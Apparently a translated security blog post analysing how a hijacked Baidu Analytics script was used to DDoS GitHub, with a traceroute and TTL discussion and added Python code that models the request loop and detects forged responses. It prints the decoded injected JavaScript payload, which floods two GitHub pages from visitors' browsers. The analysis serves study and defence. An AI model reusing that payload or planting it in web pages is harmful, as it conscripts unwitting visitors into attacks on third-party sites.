Temporary workaround:
Edit your hosts file and add the line "127.0.0.1 hm.baidu.com".
Detailed analysis of the cause: At noon today, while browsing zone.wooyun.org, the country's largest information security practitioners' "same-sex dating community", my browser suddenly started popping up a window every 2 seconds:
Malicious JavaScript detected on this domain
My first reaction was that some mischievous zone user had XSSed the site again, so I immediately opened the developer tools to analyze it.
0x01 Details
I immediately found that the JS behind the pop-up was actually being loaded from GitHub:
But why would WooYun load JS from GitHub, and from the GreatFire and New York Times mirrors at that?
My first guess was that the page had an XSS or that its JS had been hijacked. After searching for half a day I finally found it, and incredibly it was:
hm.baidu.com/h.js
This JS really is loaded by WooYun: it is the Baidu Analytics (Baidu Tongji) tracking script. Opening it, the inside is just a simply obfuscated JS, an eval of an encoded string. I casually found an online decoder, ran it through, and found the following content:
```javascript
// Decoded hm.baidu.com/h.js as served to clients outside the wall (the injected payload)
document.write("<script src='http://libs.baidu.com/jquery/2.0.0/jquery.min.js'>\x3c/script>");
!window.jQuery && document.write("<script src='http://code.jquery.com/jquery-latest.js'>\x3c/script>");
startime = (new Date).getTime();
var count = 0;
function unixtime() {
    var a = new Date;
    return Date.UTC(a.getFullYear(), a.getMonth(), a.getDay(), a.getHours(), a.getMinutes(), a.getSeconds()) / 1E3
}
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
NUM = url_array.length;
function r_send2() {
    var a = unixtime() % NUM;   // alternate between the two targets by clock second
    get(url_array[a])
}
function get(a) {
    var b;
    $.ajax({
        url: a,
        dataType: "script",
        timeout: 1E4,
        cache: !0,
        beforeSend: function() {
            requestTime = (new Date).getTime()
        },
        complete: function() {
            responseTime = (new Date).getTime();
            b = Math.floor(responseTime - requestTime);   // measured round-trip time
            // keep looping for 5 minutes after load; the next request is scheduled one RTT later
            3E5 > responseTime - startime && (r_send(b), count += 1)
        }
    })
}
function r_send(a) {
    setTimeout("r_send2()", a)
}
setTimeout("r_send2()", 2E3);   // first request 2 seconds after load
```
Roughly, what it does is: after it loads, with caching disabled, it requests every 2 seconds one of the two URLs in
url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];
I asked some friends inside the wall, and the JS they see is normal. But accessing
http://hm.baidu.com/h.js
from an IP outside the wall returns the JS file above, which requests those two URLs every 2 seconds.
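To quantify what this loop means for the target, here is an added model, my own Python and not code from the post or from Baidu, of the scheduler in the decoded script: the first request goes out 2 seconds after load, each subsequent request one round-trip after the previous reply, for as long as replies arrive within 5 minutes of page load. It also pulls the target list out of decoded script text with a regex. The latency values and DECODED_SNIPPET are constructed inputs; the model uses plain Unix seconds for the target selection rather than the script's Date.UTC expression.

```python
"""Added example: a model of the request loop in the decoded h.js payload.

Not code from the post or from Baidu; it reproduces the scheduling logic
(setTimeout 2 s, then re-schedule after the last measured RTT while still
within 5 minutes of load) so the request volume per victim tab can be estimated.
"""
import re

START_DELAY_MS = 2_000     # setTimeout("r_send2()", 2E3)
WINDOW_MS = 300_000        # 3E5 > responseTime - startime
TARGETS = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"]

# Constructed stand-in for the decoded script text.
DECODED_SNIPPET = 'url_array = ["https://github.com/greatfire/", "https://github.com/cn-nytimes/"];'


def extract_url_array(js_text):
    """Pull the target list out of decoded script text (url_array = [...])."""
    m = re.search(r'url_array\s*=\s*\[(.*?)\]', js_text, re.S)
    return re.findall(r'"([^"]+)"', m.group(1)) if m else []


def pick_target(unix_seconds, targets=TARGETS):
    """unixtime() % NUM: the target alternates with the parity of the clock second."""
    return targets[int(unix_seconds) % len(targets)]


def simulate_loop(latency_ms, start_unix=0, targets=TARGETS):
    """Return [(send_time_ms, target), ...] for one tab, assuming a constant RTT.

    A zero RTT would make the loop spin without advancing time, so it is rejected.
    """
    if latency_ms <= 0:
        raise ValueError("latency_ms must be positive")
    sends = []
    now = START_DELAY_MS
    while True:
        sends.append((now, pick_target(start_unix + now / 1000.0, targets)))
        done = now + latency_ms          # complete: callback fires when the reply lands
        if not (WINDOW_MS > done):       # 3E5 > responseTime - startime no longer holds
            break
        now = done + latency_ms          # r_send(b): next send one RTT after the reply
    return sends


def requests_per_tab(latency_ms):
    """Number of requests one browser tab makes before the 5-minute window closes."""
    return len(simulate_loop(latency_ms))


if __name__ == "__main__":
    print("targets:", extract_url_array(DECODED_SNIPPET))
    for rtt in (50, 100, 500):
        print(f"RTT {rtt} ms -> {requests_per_tab(rtt)} requests in 5 minutes")
```

The model makes the amplification visible: the lower the round-trip time to the target, the more requests each tab generates, so a fast-responding server draws more traffic from every hijacked visitor. It also shows why the targets' alert() trick worked: a modal dialog stops the timer callbacks, which is the only thing keeping the loop alive.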
Opening Twitter, it appears that GitHub has been under DDoS attack since March 18, and GreatFire then changed the content of the attacked page to
```javascript
alert("Warning: malicious JavaScript detected on this domain")
```
so that the alert window blocks the JS from executing in a loop.
Fig. 3 Record of a traceroute from a foreign IP to hm.baidu.com
DNS does not appear to have been hijacked; it seems that, as before, either the IP was hijacked directly or the file was replaced directly at the HTTP layer.
A port scan of the server showed only 80 and 443 open; access over HTTPS returns the normal empty page (the JS file only appears when a Referer header is sent).
By the time I wanted to do a packet capture analysis, the hijacking had stopped; on Twitter I saw that someone had already analyzed it, quoted below for reference:
Packet capture tracing: compared with the TTL of the normal Baidu server's replies to my Japanese VPS, the TTL of the RESP HTTP OK message is 47, so one can conclude that there is a middlebox sending forged packets to the VPS.
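The TTL comparison in the quoted analysis can be turned into a repeatable check. The following is an added example, my own Python rather than the post's or the tweet author's code, that takes the server's SYN-ACK TTL as the baseline (the handshake completed with the genuine server) and flags any later packet from that server whose TTL differs by more than a tolerance. The packet records and the documentation-range IP addresses are constructed; a real run would fill the same fields from a pcap parser.

```python
"""Added example: flagging injected HTTP responses by IP TTL mismatch.

Not code from the post; it applies the check described in the quoted tweet
(a forged HTTP 200 arriving with a different TTL than the real server's
packets) to constructed packet records of the kind a pcap parser would yield.
"""

# Constructed records (documentation-range IPs): 203.0.113.10 stands in for
# the analytics server, 198.51.100.5 for the capturing VPS.
SAMPLE_PACKETS = [
    {"src": "203.0.113.10", "dst": "198.51.100.5", "sport": 80, "flags": "SA", "ttl": 52,
     "payload": b""},
    {"src": "198.51.100.5", "dst": "203.0.113.10", "sport": 51234, "flags": "PA", "ttl": 64,
     "payload": b"GET /h.js HTTP/1.1\r\nHost: hm.baidu.com\r\nReferer: http://zone.wooyun.org/\r\n\r\n"},
    # The forged reply: correct 5-tuple, but a hop count the real server never shows.
    {"src": "203.0.113.10", "dst": "198.51.100.5", "sport": 80, "flags": "PA", "ttl": 47,
     "payload": b"HTTP/1.1 200 OK\r\nContent-Type: application/javascript\r\n\r\neval(\"...\")"},
    {"src": "203.0.113.10", "dst": "198.51.100.5", "sport": 80, "flags": "A", "ttl": 52,
     "payload": b""},
]


def find_ttl_anomalies(packets, client_ip, tolerance=1):
    """Return inbound packets whose TTL deviates from the server's handshake TTL.

    The SYN-ACK is the baseline because the TCP handshake completed with the
    genuine server; an on-path injector that only races the HTTP reply sits at a
    different hop distance. `tolerance` absorbs small path changes such as ECMP.
    """
    baseline = {}
    anomalies = []
    for p in packets:
        if p["dst"] != client_ip:
            continue                      # only traffic arriving at the capture host
        key = (p["src"], p["sport"])
        if p["flags"] == "SA":
            baseline[key] = p["ttl"]      # remember the genuine server's TTL
            continue
        if key in baseline and abs(p["ttl"] - baseline[key]) > tolerance:
            anomalies.append(dict(p, baseline_ttl=baseline[key]))
    return anomalies


def summarize(anomalies):
    """One line per flagged packet: source, TTL vs baseline, first payload line."""
    lines = []
    for a in anomalies:
        first = a["payload"].split(b"\r\n", 1)[0].decode("ascii", "replace")
        lines.append(f'{a["src"]}:{a["sport"]} ttl={a["ttl"]} (baseline {a["baseline_ttl"]}) {first}')
    return lines


if __name__ == "__main__":
    for line in summarize(find_ttl_anomalies(SAMPLE_PACKETS, "198.51.100.5")):
        print(line)
```

A TTL mismatch is evidence, not proof: routes can change mid-connection, so a tolerance of one or two hops keeps false positives down, and the injected body (here an eval-wrapped script) should be saved alongside the flagged packet for comparison with the file fetched from a vantage point inside the wall.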
Outrageous, isn't it?
It suddenly reminded me of a remark a webmaster made earlier, when DNS was being hijacked to a foreign server:
They have weaponized their entire population.
It should now be:
They have weaponized their entire population of the Earth.